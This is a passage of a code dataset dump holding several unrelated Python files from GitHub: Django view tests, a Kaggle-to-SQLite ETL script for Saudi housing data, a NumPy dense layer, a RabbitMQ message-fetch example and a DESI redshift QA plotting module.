\"/invitations/~create\",\n dict(email=email, first_name=\"FN\", last_name=\"LN\", org=org.id),\n follow=True,\n )\n assert resp.status_code == 200\n assert (f\"An invitation was sent to {email}\").encode() in resp.content\n assert models.Invitation.where(org=org).exists()\n\n\ndef test_cv(client, admin_user):\n\n resp = client.get(\"/profile/cvs/\")\n assert resp.status_code == 302\n\n client.force_login(admin_user)\n\n resp = client.post(\n \"/profile/cvs/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-id\": \"\",\n \"form-0-title\": \"TEST\",\n \"form-0-file\": BytesIO(b\"TEST\"),\n \"save\": \"Save\",\n },\n follow=True,\n )\n assert b\"Please complete your profile\" in resp.content\n\n profile = models.Profile.create(user=admin_user, is_completed=True)\n\n resp = client.get(\"/profile/cvs/\")\n\n resp = client.post(\n \"/profile/cvs/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-id\": \"\",\n \"form-0-profile\": profile.id,\n 
\"form-0-owner\": admin_user.id,\n \"form-0-title\": \"TEST\",\n \"form-0-file\": BytesIO(b\"TEST\"),\n \"save\": \"Save\",\n },\n follow=True,\n )\n\n assert resp.status_code == 200\n assert models.CurriculumVitae.where(owner=admin_user, profile=profile).exists()\n","repo_name":"nad2000/RSTA-apportal-hub","sub_path":"portal/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":16727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9740778754","text":"#import needed packages\nimport os\nimport pandas as pd\nimport zipfile as zp\nimport sqlite3 as sql3\nfrom dotenv import dotenv_values\nfrom IPython.display import display\n\n#importing our secrets from environment varibales\nconfig = dotenv_values(\".env\")\nos.environ['KAGGLE_USERNAME'] = config.get('KAGGLE_USERNAME')\nos.environ['KAGGLE_KEY'] = config.get('KAGGLE_KEY')\n\n#connecting to kaggle via api\nfrom kaggle.api.kaggle_api_extended import KaggleApi\nkgl_api = KaggleApi()\nkgl_api.authenticate()\n\n#here we declare where our paths is for (main data folder, kaggle dataset, extraction path)\ndata_path = '../data' #main data path\nsqlite_path = '../db' #main db path\nkaggle_dataset = 'majedalhulayel/sakani-projects-saudi-arabia' #kaggle dataset path\n\n#lets get the data\nkgl_api.dataset_download_files(kaggle_dataset, data_path)\n\n#unzip the dataset file and save to new dir\ntry:\n if os.path.exists(data_path): #if the data folder do exists enter here\n with zp.ZipFile(data_path+'/sakani-projects-saudi-arabia.zip') as data: #take from original path\n data.extractall(data_path) #uzip into the path if exists\n print(f\"Done extracting all files to: {data_path}\") #message\n \n else: #if the data folder doesn't exists enter here\n print(f'Creating new data folder: {data_path}\\n') #message\n os.mkdir(data_path) #create new folder if not exists\n with zp.ZipFile(data_path+'/sakani-projects-saudi-arabia.zip') as data: #take from original path\n data.extractall(data_path) #unzip into the new path\n print(f\"Done extracting all files to: {data_path}\") #message\nexcept Exception as e:\n print(f\"Invalid file \\n{e}\")\n\n#lets play with the dataset\ndf = pd.read_csv(\"../data/Sakani Projects.csv\")\n\n#rename some columns to more clean naming\ndf.rename(columns = {'under_construction_status':'construction_status','unit_types_0':'unit_type',\\\n 'available_units_for_auctions_count':'available_auctions_units','available_units_count':'available_units'}, inplace=True)\n\n#clean row-level data\ndf['developer_name'].fillna('لا يوجد مدخل', inplace=True)\ndf['publish_date'].ffill(inplace=True) #filling nan values with prev value\ndf['construction_status'].fillna('no entry', inplace=True)\ndf['location'] = df['location_lat'].astype(str) +','+ df['location_lon'].astype(str) #create new column to handle the lat,lot location\n\n#un_wanted columns to delete\ndf.drop(['city_id','region_id','region_key','region_order_sequence','city_order_sequence','group_unit_id','promoted','unit_types_1', \\\n 'unit_types_2','type','resource_id','resource_type','subsidizable','max_street_width','max_unit_age','max_bathroom','driver_room', \\\n 'elevator','basement','delegated_by_broker','maid_room','min_bathroom','min_street_width','min_unit_age','pool','publish','use_register_interest_flag', \\\n 'location_lat', 'location_lon'], axis=1, inplace=True)\n\n#lets see the dataset after cleaning and before loading it to the DWH\ndisplay(df.head()) #here we see the dataset in style of 
dataframe\nprint(f\"Dataset rows/columns: {df.shape}\") #here we see the dataset shape after cleaning\n\n#lets save the new data to another file\nprint(f\"Saving the new data to another file: {data_path}/cleaned_data.csv\")\ndf.to_csv(data_path+'/cleaned_data.csv', index=False)\n\n#lets load our cleand data into sqlite table\ntry:\n if os.path.exists(sqlite_path): #if the data folder do exists enter here\n engine = sql3.connect(config.get('SQLITE_DB'))\n df.to_sql(config.get('SQLITE_TABLE'), engine, index=False)\n print(f\"Loading data into sqlite3 database ...!\")\n\n else: #if the data folder doesn't exists enter here\n print(f'Creating new db folder: {sqlite_path}\\n') #message\n os.mkdir(sqlite_path) #create new folder if not exists\n engine = sql3.connect(config.get('SQLITE_DB'))\n df.to_sql(config.get('SQLITE_TABLE'), engine, index=False)\n print(f\"Loading data into sqlite3 database ...!\")\nexcept Exception as e:\n print(f\"Invalid db ... \\n{e}\")\n","repo_name":"iimrx/sakani_analysis","sub_path":"code/sakani_etl.py","file_name":"sakani_etl.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"27052139338","text":"\nimport numpy as np\nfrom lib.layers.layer import Layer\n\nclass Dense(Layer):\n\n def __init__(self, n_inputs, n_neurons, activation_function = None) -> None:\n self.weights = np.random.randn(n_inputs, n_neurons) * 0.1\n self.biases = np.zeros((1, n_neurons)) # Bias Vector using 0\n self.activation_function = activation_function\n\n def forward(self, inputs):\n self.inputs = inputs\n if len(self.inputs.shape) == 1:\n self.inputs = np.array([self.inputs])\n self.output = np.dot(self.inputs, self.weights) + self.biases\n if self.activation_function:\n self.output = self.activation_function(self.output)\n return self.output\n \n def backward(self, output_error, learning_rate = 0.2):\n self.dvalues = output_error\n input_error = np.dot(output_error, self.weights.T)\n weights_error = np.dot(self.inputs.T, output_error)\n\n self.weights -= learning_rate * weights_error\n self.biases -= learning_rate * output_error\n return input_error","repo_name":"CarlosCalgaro/Neural-Network","sub_path":"lib/layers/dense.py","file_name":"dense.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1169118053","text":"#!/usr/bin/env python\n\n# Import the RabbitMQ Client Library\nimport rabbitpy\n\nurl = 'amqp://guest:guest@localhost:5672/%2F'\n\nconnection = rabbitpy.Connection(url)\n\nchannel = connection.channel()\n\nqueue = rabbitpy.Queue(channel, 'example')\n\n# while there are messages in the queue, fetch them using Basic.Get\nwhile len(queue) > 0:\n message = queue.get()\n print('Message:')\n print(' ID: %s' % message.properties['message_id'])\n print(' Time: %s' % message.properties['timestamp'].isoformat())\n print(' Body: %s' % message.body)\n message.ack()\n","repo_name":"dhyana1984/rabbit-in-depth","sub_path":"ch2/basic-get-example.py","file_name":"basic-get-example.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37686995071","text":"\"\"\"\ndesisim.spec_qa.redshifts\n=========================\n\nModule to run high_level QA on a given DESI run\n\nWritten by JXP on 3 Sep 2015\n\"\"\"\nfrom __future__ import print_function, absolute_import, division\n\nimport matplotlib\n# 
matplotlib.use('Agg')\n\nimport numpy as np\nimport sys, os, pdb, glob\n\nfrom matplotlib import pyplot as plt\nimport matplotlib.gridspec as gridspec\n\nfrom astropy.io import fits\nfrom astropy.table import Table, vstack, hstack, MaskedColumn, join\n\nfrom .utils import elg_flux_lim, get_sty_otype, catastrophic_dv, match_otype\n\nfrom desiutil.log import get_logger, DEBUG\n\n\ndef calc_dz(simz_tab):\n '''Calcualte deltaz/(1+z) for a given simz_tab\n '''\n dz = (simz_tab['Z']-simz_tab['TRUEZ'])/(1+simz_tab['TRUEZ'])\n #\n return dz\n\n\ndef calc_dzsig(simz_tab):\n '''Calcualte deltaz/sig(z) for a given simz_tab\n '''\n dzsig = (simz_tab['Z']-simz_tab['TRUEZ'])/simz_tab['ZERR']\n #\n return dzsig\n\n\ndef calc_stats(simz_tab, objtype, flux_lim=True):\n \"\"\"Calculate redshift statistics for a given objtype\n\n Parameters\n ----------\n simz_tab : Table\n This parameter is not documented.\n objtype : str\n Object type, e.g. 'ELG', 'LRG'\n flux_lim : bool, optional\n Impose the flux limit for ELGs? [True]\n \"\"\"\n # Cut on targets that were analyzed by RedMonster\n\n # Init\n stat_dict = {} #dict(OBJTYPE=objtype)\n\n # N targets\n obj_tab = slice_simz(simz_tab, objtype=objtype)\n stat_dict['NTARG'] = len(obj_tab)\n\n # Number of objects with RedMonster\n zobj_tab = slice_simz(simz_tab,objtype=objtype,redm=True)\n stat_dict['N_RM'] = len(zobj_tab)\n\n\n # Redshift measured (includes catastrophics)\n # For ELGs, cut on OII_Flux too\n survey_tab = slice_simz(simz_tab,objtype=objtype,survey=True)\n stat_dict['N_SURVEY'] = len(survey_tab)\n\n # Catastrophic failures\n cat_tab = slice_simz(simz_tab,objtype=objtype,\n survey=True,catastrophic=True)\n stat_dict['NCAT'] = len(cat_tab)\n if stat_dict['N_SURVEY'] > 0:\n stat_dict['CAT_RATE'] = len(cat_tab)/stat_dict['N_SURVEY']\n else:\n stat_dict['CAT_RATE'] = 0\n\n # Good redshifts\n gdz_tab = slice_simz(simz_tab,objtype=objtype,\n survey=True,good=True)\n stat_dict['N_GDZ'] = len(gdz_tab)\n\n # Redshift with ZWARN=0\n zwarn0_tab = slice_simz(simz_tab,objtype=objtype,\n survey=True,all_zwarn0=True,good=True)\n stat_dict['N_ZWARN0'] = len(zwarn0_tab)\n\n # Efficiency\n if stat_dict['N_SURVEY'] > 0:\n stat_dict['EFF'] = float(len(gdz_tab))/float(stat_dict['N_SURVEY'])\n else:\n stat_dict['EFF'] = 1.\n\n # Purity\n if stat_dict['N_ZWARN0'] > 0:\n stat_dict['PURITY'] = float(len(gdz_tab))/float(stat_dict['N_ZWARN0'])\n else:\n stat_dict['PURITY'] = 1.\n\n # delta z\n dz = calc_dz(gdz_tab)\n if len(dz) == 0:\n dz = np.zeros(1)\n not_nan = np.isfinite(dz)\n stat_dict['MEAN_DZ'] = float(np.mean(dz[not_nan]))\n stat_dict['MEDIAN_DZ'] = float(np.median(dz[not_nan]))\n stat_dict['RMS_DZ'] = float(np.std(dz[not_nan]))\n\n # Return\n return stat_dict\n\n\ndef load_z(fibermap_files, zbest_files, outfil=None):\n '''Load input and output redshift values for a set of exposures\n\n Parameters\n ----------\n fibermap_files: list\n List of fibermap files\n zbest_files: list\n List of zbest output files from Redmonster\n outfil: str, optional\n Output file for the table\n\n Returns\n -------\n Table\n Table of target info including Redmonster redshifts\n '''\n # imports\n log = get_logger()\n\n # Init\n\n # Load up fibermap and simspec tables\n fbm_tabs = []\n sps_tabs = []\n for fibermap_file in fibermap_files:\n fbm_hdu = fits.open(fibermap_file)\n\n # skip calibration exposures\n flavor = fbm_hdu[1].header['FLAVOR']\n fbm_hdu.close()\n if flavor in ('arc', 'flat', 'bias'):\n continue\n\n log.info('Reading: {:s}'.format(fibermap_file))\n # Load simspec (for 
fibermap too!)\n simspec_file = fibermap_file.replace('fibermap','simspec')\n sps_hdu = fits.open(simspec_file)\n # Make Tables\n fbm_tabs.append(Table(sps_hdu['FIBERMAP'].data,masked=True))\n sps_tabs.append(Table(sps_hdu['TRUTH'].data,masked=True))\n sps_hdu.close()\n\n # Stack\n fbm_tab = vstack(fbm_tabs)\n sps_tab = vstack(sps_tabs)\n del fbm_tabs, sps_tabs\n\n # Add the version number header keywords from fibermap_files[0]\n hdr = fits.getheader(fibermap_files[0].replace('fibermap', 'simspec'))\n for key, value in sorted(hdr.items()):\n if key.startswith('DEPNAM') or key.startswith('DEPVER'):\n fbm_tab.meta[key] = value\n\n # Drop to unique\n univ, uni_idx = np.unique(np.array(fbm_tab['TARGETID']),return_index=True)\n fbm_tab = fbm_tab[uni_idx]\n sps_tab = sps_tab[uni_idx]\n\n # Combine + Sort\n sps_tab.remove_column('TARGETID') # It occurs in both tables\n sps_tab.remove_column('MAG') # It occurs in both tables\n simz_tab = hstack([fbm_tab,sps_tab],join_type='exact')\n simz_tab.sort('TARGETID')\n nsim = len(simz_tab)\n\n # Cleanup some names\n #simz_tab.rename_column('OBJTYPE_1', 'OBJTYPE')\n #simz_tab.rename_column('OBJTYPE_2', 'TRUETYPE')\n\n # Rename QSO\n qsol = np.where( match_otype(simz_tab, 'QSO') &\n (simz_tab['TRUEZ'] >= 2.1))[0]\n simz_tab['TEMPLATETYPE'][qsol] = 'QSO_L'\n qsot = np.where( match_otype(simz_tab, 'QSO') &\n (simz_tab['TRUEZ'] < 2.1))[0]\n simz_tab['TEMPLATETYPE'][qsot] = 'QSO_T'\n\n # Load up zbest files\n zb_tabs = []\n for zbest_file in zbest_files:\n try:\n zb_hdu = fits.open(zbest_file)\n except FileNotFoundError:\n log.info(\"ZBEST FILE NOT FOUND. I HOPE YOU ARE ONLY TESTING\")\n else:\n zb_tabs.append(Table(zb_hdu[1].data))\n\n # Stack\n zb_tab = vstack(zb_tabs)\n univ, uni_idx = np.unique(np.array(zb_tab['TARGETID']),return_index=True)\n zb_tab = zb_tab[uni_idx]\n\n # Match up\n sim_id = np.array(simz_tab['TARGETID'])\n z_id = np.array(zb_tab['TARGETID'])\n inz = np.in1d(z_id,sim_id,assume_unique=True)\n ins = np.in1d(sim_id,z_id,assume_unique=True)\n\n z_idx = np.arange(z_id.shape[0])[inz]\n sim_idx = np.arange(sim_id.shape[0])[ins]\n assert np.array_equal(sim_id[sim_idx],z_id[z_idx])\n\n # Fill up\n ztags = ['Z','ZERR','ZWARN','SPECTYPE']\n new_clms = []\n mask = np.array([True]*nsim)\n mask[sim_idx] = False\n for kk,ztag in enumerate(ztags):\n # Generate a MaskedColumn\n new_clm = MaskedColumn([zb_tab[ztag][z_idx[0]]]*nsim, name=ztag, mask=mask)\n #name=new_tags[kk], mask=mask)\n # Fill\n new_clm[sim_idx] = zb_tab[ztag][z_idx]\n # Append\n new_clms.append(new_clm)\n # Add columns\n\n simz_tab.add_columns(new_clms)\n\n # Write?\n if outfil is not None:\n simz_tab.write(outfil,overwrite=True)\n # Return\n return simz_tab # Masked Table\n\n\ndef obj_requirements(zstats, objtype):\n \"\"\"Assess where a given objtype passes the requirements\n Requirements from Doc 318 (August 2014)\n\n Parameters\n ----------\n zstats : Object\n This parameter is not documented.\n objtype : str\n Object type, e.g. 
'ELG', 'LRG'\n\n Returns\n -------\n dict\n Pass/fail dict\n \"\"\"\n log = get_logger()\n pf_dict = {}\n #\n all_dict=dict(ELG={'RMS_DZ':0.0005, 'MEAN_DZ': 0.0002, 'CAT_RATE': 0.05, 'EFF': 0.90},\n LRG={'RMS_DZ':0.0005, 'MEAN_DZ': 0.0002, 'CAT_RATE': 0.05, 'EFF': 0.95},\n BGS={'RMS_DZ':0.0005, 'MEAN_DZ': 0.0002, 'CAT_RATE': 0.05, 'EFF': 0.95},\n MWS={'RMS_DZ':0.0005, 'MEAN_DZ': 0.0002, 'CAT_RATE': 0.05, 'EFF': 0.95},\n QSO_T={'RMS_DZ':0.0025, 'MEAN_DZ': 0.0004, 'CAT_RATE': 0.05, 'EFF': 0.90},\n QSO_L={'RMS_DZ':0.0025, 'CAT_RATE': 0.02, 'EFF': 0.90})\n req_dict = all_dict[objtype]\n\n tst_fail = ''\n passf = str('PASS')\n for key in req_dict:\n ipassf = str('PASS')\n if key in ['EFF']: # Greater than requirement\n if zstats[key] < req_dict[key]:\n ipassf = str('FAIL')\n tst_fail = tst_fail+key+'-'\n log.warning('{:s} failed requirement {:s}: {} < {}'.format(objtype, key, zstats[key], req_dict[key]))\n else:\n log.debug('{:s} passed requirement {:s}: {} >= {}'.format(objtype, key, zstats[key], req_dict[key]))\n else:\n if zstats[key] > req_dict[key]:\n ipassf = str('FAIL')\n tst_fail = tst_fail+key+'-'\n log.warning('{:s} failed requirement {:s}: {} > {}'.format(objtype, key, zstats[key], req_dict[key]))\n else:\n log.debug('{:s} passed requirement {:s}: {} <= {}'.format(objtype, key, zstats[key], req_dict[key]))\n # Update\n pf_dict[key] = ipassf\n if ipassf == str('FAIL'):\n passf = str('FAIL')\n if passf == str('FAIL'):\n tst_fail = tst_fail[:-1]\n # log.warning('OBJ={:s} failed tests {:s}'.format(objtype,tst_fail))\n #\n #pf_dict['FINAL'] = passf\n return pf_dict, passf\n\n\ndef slice_simz(simz_tab, objtype=None, redm=False, survey=False,\n catastrophic=False, good=False, all_zwarn0=False):\n '''Slice input simz_tab in one of many ways\n\n Parameters\n ----------\n redm : bool, optional\n RedMonster analysis required?\n all_zwarn0 : bool, optional\n Ignores catastrophic failures in the slicing to return\n all sources with ZWARN==0\n survey : bool, optional\n Only include objects that satisfy the Survey requirements\n e.g. 
ELGs with sufficient OII_flux\n\n Returns\n -------\n simz_table : Table cut by input parameters\n '''\n # Init\n nrow = len(simz_tab)\n\n # Object type\n if objtype is None:\n objtype_mask = np.array([True]*nrow)\n else:\n objtype_mask = match_otype(simz_tab, objtype) # simz_tab['TEMPLATETYPE'] == objtype\n # RedMonster analysis\n if redm:\n redm_mask = simz_tab['Z'].mask == False # Not masked in Table\n else:\n redm_mask = np.array([True]*nrow)\n # Survey\n if survey:\n survey_mask = (simz_tab['Z'].mask == False)\n # Flux limit\n elg = np.where(match_otype(simz_tab, 'ELG') & survey_mask)[0]\n elg_mask = elg_flux_lim(simz_tab['TRUEZ'][elg],\n simz_tab['OIIFLUX'][elg])\n # Update\n survey_mask[elg[~elg_mask]] = False\n else:\n survey_mask = np.array([True]*nrow)\n # Catastrophic/Good (This gets messy...)\n if (catastrophic or good):\n if catastrophic:\n catgd_mask = np.array([False]*nrow)\n else:\n catgd_mask = simz_tab['ZWARN']==0\n for obj in ['ELG','LRG','QSO_L','QSO_T']:\n dv = catastrophic_dv(obj) # km/s\n omask = np.where(match_otype(simz_tab, objtype) & (simz_tab['ZWARN']==0))[0]\n dz = calc_dz(simz_tab[omask]) # dz/1+z\n cat = np.where(np.abs(dz)*3e5 > dv)[0]\n # Update\n if catastrophic:\n catgd_mask[omask[cat]] = True\n else:\n if not all_zwarn0:\n catgd_mask[omask[cat]] = False\n else:\n catgd_mask = np.array([True]*nrow)\n\n # Final mask\n mask = objtype_mask & redm_mask & survey_mask & catgd_mask\n\n # Return\n return simz_tab[mask]\n\ndef obj_fig(simz_tab, objtype, summ_stats, outfile=None):\n \"\"\"Generate QA plot for a given object type\n \"\"\"\n from astropy.stats import sigma_clip\n logs = get_logger()\n gdz_tab = slice_simz(simz_tab,objtype=objtype, survey=True,good=True)\n if objtype == 'ELG':\n allgd_tab = slice_simz(simz_tab,objtype=objtype, survey=False,good=True)\n\n if len(gdz_tab) <= 1:\n logs.info(\"Not enough objects of type {:s} for QA\".format(objtype))\n return\n\n # Plot\n sty_otype = get_sty_otype()\n fig = plt.figure(figsize=(8, 6.0))\n gs = gridspec.GridSpec(2,2)\n # Title\n fig.suptitle('{:s}: Summary'.format(sty_otype[objtype]['lbl']),\n fontsize='large')\n\n # Offset\n for kk in range(4):\n yoff = 0.\n ax= plt.subplot(gs[kk])\n if kk == 0:\n yval = calc_dzsig(gdz_tab)\n ylbl = (r'$(z_{\\rm red}-z_{\\rm true}) / \\sigma(z)$')\n ylim = 5.\n # Stats with clipping\n clip_y = sigma_clip(yval, sigma=5.)\n rms = np.std(clip_y)\n redchi2 = np.sum(clip_y**2)/np.sum(~clip_y.mask)\n #\n xtxt = 0.05\n ytxt = 1.0\n for req_tst in ['EFF','CAT_RATE']:\n ytxt -= 0.12\n if summ_stats[objtype]['REQ_INDIV'][req_tst] == 'FAIL':\n tcolor='red'\n else:\n tcolor='green'\n ax.text(xtxt, ytxt, '{:s}: {:.3f}'.format(req_tst,\n summ_stats[objtype][req_tst]), color=tcolor,\n transform=ax.transAxes, ha='left', fontsize='small')\n # Additional\n ytxt -= 0.12\n ax.text(xtxt, ytxt, '{:s}: {:.3f}'.format('RMS:', rms),\n color='black', transform=ax.transAxes, ha='left', fontsize='small')\n ytxt -= 0.12\n ax.text(xtxt, ytxt, '{:s}: {:.3f}'.format(r'$\\chi^2_\\nu$:',\n redchi2), color='black', transform=ax.transAxes,\n ha='left', fontsize='small')\n else:\n yval = calc_dz(gdz_tab)\n if kk == 1:\n ylbl = (r'$(z_{\\rm red}-z_{\\rm true}) / (1+z)$')\n else:\n ylbl = r'$\\delta v_{\\rm red-true}$ [km/s]'\n ylim = max(5.*summ_stats[objtype]['RMS_DZ'],1e-5)\n if (np.median(summ_stats[objtype]['MEDIAN_DZ']) >\n summ_stats[objtype]['RMS_DZ']):\n yoff = summ_stats[objtype]['MEDIAN_DZ']\n\n if kk==1:\n # Stats\n xtxt = 0.05\n ytxt = 1.0\n dx = ((ylim/2.)//0.0001 +1)*0.0001\n 
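# round half the y-range up to the next multiple of 0.0001 so the tick labels stay sparse and readable\n 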
ax.xaxis.set_major_locator(plt.MultipleLocator(dx))\n for stat in ['RMS_DZ','MEAN_DZ', 'MEDIAN_DZ']:\n ytxt -= 0.12\n try:\n pfail = summ_stats[objtype]['REQ_INDIV'][stat]\n except KeyError:\n tcolor='black'\n else:\n if pfail == 'FAIL':\n tcolor='red'\n else:\n tcolor='green'\n ax.text(xtxt, ytxt, '{:s}: {:.5f}'.format(stat,\n summ_stats[objtype][stat]), color=tcolor,\n transform=ax.transAxes, ha='left', fontsize='small')\n # Histogram\n if kk < 2:\n binsz = ylim/10.\n #i0, i1 = int( np.min(yval) / binsz) - 1, int( np.max(yval) / binsz) + 1\n i0, i1 = int(-ylim/binsz) - 1, int( ylim/ binsz) + 1\n rng = tuple( binsz*np.array([i0,i1]) )\n nbin = i1-i0\n # Histogram\n hist, edges = np.histogram(yval, range=rng, bins=nbin)\n xhist = (edges[1:] + edges[:-1])/2.\n #ax.hist(xhist, color='black', bins=edges, weights=hist)#, histtype='step')\n ax.hist(xhist, color=sty_otype[objtype]['color'], bins=edges, weights=hist)#, histtype='step')\n ax.set_xlabel(ylbl)\n ax.set_xlim(-ylim, ylim)\n\n else:\n if kk == 2:\n lbl = r'$z_{\\rm true}$'\n xval = gdz_tab['TRUEZ']\n xmin,xmax=np.min(xval),np.max(xval)\n dx = np.maximum(1,(xmax-xmin)//0.5)*0.1\n ax.xaxis.set_major_locator(plt.MultipleLocator(dx))\n #xmin,xmax=0.6,1.65\n elif kk == 3:\n if objtype == 'ELG':\n lbl = r'[OII] Flux ($10^{-16}$)'\n #xval = gdz_tab['OIIFLUX']*1e16\n xval = allgd_tab['OIIFLUX']*1e16\n yval = calc_dz(allgd_tab)\n # Avoid NAN\n gdy = np.isfinite(yval)\n xval = xval[gdy]\n yval = yval[gdy]\n xmin,xmax=0.5,20\n ax.set_xscale(\"log\", nonposy='clip')\n else:\n lbl = '{:s} (Mag)'.format(gdz_tab[0]['FILTER'][0])\n xval = gdz_tab['MAG'][:,0]\n xmin,xmax=np.min(xval),np.max(xval)\n # Labels\n ax.set_xlabel(lbl)\n ax.set_ylabel(ylbl)\n ax.set_xlim(xmin,xmax)\n v_ylim = ylim * 3e5 # redshift to km/s\n ax.set_ylim(-v_ylim+yoff, v_ylim+yoff)\n\n # Points\n ax.plot([xmin,xmax], [0.,0], '--', color='gray')\n #ax.scatter(xval, yval, marker='o', s=1, label=objtype,\n # color=sty_otype[objtype]['color'])\n cm = plt.get_cmap(sty_otype[objtype]['pcolor'])\n if objtype == 'ELG':\n xbins = 10**np.linspace(np.log10(xmin), np.log10(xmax), 20)\n else:\n xbins = np.linspace(xmin, xmax, 20)\n ybins = np.linspace(-v_ylim+yoff, v_ylim+yoff, 40) # km/s\n #import pdb; pdb.set_trace()\n counts, xedges, yedges = np.histogram2d(xval, yval * 3e5, bins=(xbins, ybins))\n max_c = np.max(counts)\n #if kk == 3:\n ax.pcolormesh(xedges, yedges, counts.transpose(), cmap=cm, vmin=0, vmax=max_c/5.)\n\n #ax.hist2d(xval, yval, bins=20, cmap=cm)\n #ax.scatter(xval, yval, marker='o', s=1, label=objtype,\n # color=sty_otype[objtype]['color'])\n\n # Finish\n plt.tight_layout(pad=0.2,h_pad=0.2,w_pad=0.3)\n plt.subplots_adjust(top=0.92)\n if outfile is not None:\n plt.savefig(outfile, dpi=700)\n plt.close()\n print(\"Wrote {:s}\".format(outfile))\n\n\ndef summ_fig(simz_tab, summ_tab, meta, outfile=None):\n \"\"\"Generate summary summ_fig\n :param simz_tab:\n :param summ_tab:\n :param meta:\n :param outfile:\n :return:\n \"\"\"\n # Plot\n sty_otype = get_sty_otype()\n fig = plt.figure(figsize=(8, 5.0))\n gs = gridspec.GridSpec(3,2)\n\n # RedMonster objects\n zobj_tab = slice_simz(simz_tab,redm=True)\n otypes = ['ELG','LRG','QSO_L','QSO_T']\n\n # z vs. 
z plot\n jj=0\n ax= plt.subplot(gs[0:2,jj])\n\n # Catastrophic\n cat_tab = slice_simz(simz_tab,survey=True, catastrophic=True)\n ax.scatter(cat_tab['TRUEZ'], cat_tab['Z'],\n marker='x', s=9, label='CAT', color='red')\n\n notype = []\n for otype in otypes:\n gd_o = np.where(zobj_tab['TEMPLATETYPE']==otype)[0]\n notype.append(len(gd_o))\n ax.scatter(zobj_tab['TRUEZ'][gd_o], zobj_tab['Z'][gd_o],\n marker='o', s=1, label=sty_otype[otype]['lbl'], color=sty_otype[otype]['color'])\n ax.set_ylabel(r'$z_{\\rm red}$')\n ax.set_xlabel(r'$z_{\\rm true}$')\n ax.set_xlim(-0.1, 1.02*np.max(np.array([np.max(zobj_tab['TRUEZ']),\n np.max(zobj_tab['Z'])])))\n ax.set_ylim(-0.1, np.max(np.array([np.max(zobj_tab['TRUEZ']),\n np.max(zobj_tab['Z'])])))\n # Legend\n legend = ax.legend(loc='upper left', borderpad=0.3,\n handletextpad=0.3, fontsize='small')\n\n # Zoom\n jj=1\n ax= plt.subplot(gs[0:2,jj])\n\n for otype in otypes:\n # Grab\n gd_o = np.where(zobj_tab['TEMPLATETYPE']==otype)[0]\n # Stat\n dz = calc_dz(zobj_tab[gd_o])\n ax.scatter(zobj_tab['TRUEZ'][gd_o], dz, marker='o',\n s=1, label=sty_otype[otype]['lbl'], color=sty_otype[otype]['color'])\n\n #ax.set_xlim(xmin, xmax)\n ax.set_ylabel(r'$(z_{\\rm red}-z_{\\rm true}) / (1+z)$')\n ax.set_xlabel(r'$z_{\\rm true}$')\n ax.set_xlim(0.,4)\n deltaz = 0.002\n ax.set_ylim(-deltaz/2,deltaz)\n\n # Legend\n legend = ax.legend(loc='lower right', borderpad=0.3,\n handletextpad=0.3, fontsize='small')\n\n # Meta text\n ax= plt.subplot(gs[2,0])\n ax.set_axis_off()\n # Meta\n xlbl = 0.1\n ylbl = 0.85\n ax.text(xlbl, ylbl, 'SPECPROD: {:s}'.format(meta['SPECPROD']), transform=ax.transAxes, ha='left')\n yoff=0.15\n for key in meta:\n if key == 'SPECPROD':\n continue\n ylbl -= yoff\n ax.text(xlbl+0.1, ylbl, key+': {:s}'.format(meta[key]),\n transform=ax.transAxes, ha='left', fontsize='small')\n\n # Target stats\n ax= plt.subplot(gs[2,1])\n ax.set_axis_off()\n xlbl = 0.1\n ylbl = 0.85\n ax.text(xlbl, ylbl, 'Targets', transform=ax.transAxes, ha='left')\n yoff=0.15\n for jj,otype in enumerate(otypes):\n ylbl -= yoff\n gd_o = simz_tab['TEMPLATETYPE']==otype\n ax.text(xlbl+0.1, ylbl, sty_otype[otype]['lbl']+': {:d} ({:d})'.format(np.sum(gd_o),notype[jj]),\n transform=ax.transAxes, ha='left', fontsize='small')\n\n # Finish\n plt.tight_layout(pad=0.1,h_pad=0.0,w_pad=0.1)\n if outfile is not None:\n plt.savefig(outfile, dpi=700)\n plt.close()\n\n\n\ndef summ_stats(simz_tab, outfil=None):\n '''Generate summary stats\n\n Parameters\n ----------\n simz_tab : Table\n Table summarizing redshifts\n\n Returns\n -------\n list\n List of summary stat dicts\n '''\n otypes = ['ELG','LRG', 'QSO_L', 'QSO_T', 'BGS', 'MWS'] # WILL HAVE TO DEAL WITH QSO_TRACER vs QSO_LYA\n summ_dict = {}\n\n rows = []\n for otype in otypes:\n # Calculate stats\n stat_dict = calc_stats(simz_tab, otype)\n summ_dict[otype] = stat_dict\n # Check requirements\n summ_dict[otype]['REQ_INDIV'], passf = obj_requirements(stat_dict,otype)\n summ_dict[otype]['REQ_FINAL'] = passf\n\n # Generate Table\n #stat_tab = Table(rows=rows)\n\n # Return\n return summ_dict\n #return stat_tab\n\n\ndef plot_slices(x, y, ok, bad, x_lo, x_hi, y_cut, num_slices=5, min_count=100,\n axis=None):\n \"\"\"Scatter plot with 68, 95 percentiles superimposed in slices.\n\n Requires that the matplotlib package is installed.\n\n Parameters\n ----------\n x : array of float\n X-coordinates to scatter plot. Points outside [ `x_lo`, `x_hi` ] are\n not displayed.\n y : array of float\n Y-coordinates to scatter plot. 
Y values are assumed to be roughly\n symmetric about zero.\n ok : array of bool\n Array of booleans that identify which fits are considered good.\n bad : array of bool\n Array of booleans that identify which fits have failed catastrophically.\n x_lo : float\n Minimum value of `x` to plot.\n x_hi : float\n Maximum value of `x` to plot.\n y_cut : float\n The target maximum value of :math:`|y|`. A dashed line at this value is\n added to the plot, and the vertical axis is clipped at\n :math:`|y| = 1.25 \\times y_{cut}` (but values outside this range are included in\n the percentile statistics).\n num_slices : int\n Number of equally spaced slices to divide the interval [ `x_lo`, `x_hi` ]\n into.\n min_count : int\n Do not use slices with fewer points for superimposed percentile\n statistics.\n axis : matplotlib axis object or None\n Uses the current axis if this is None.\n 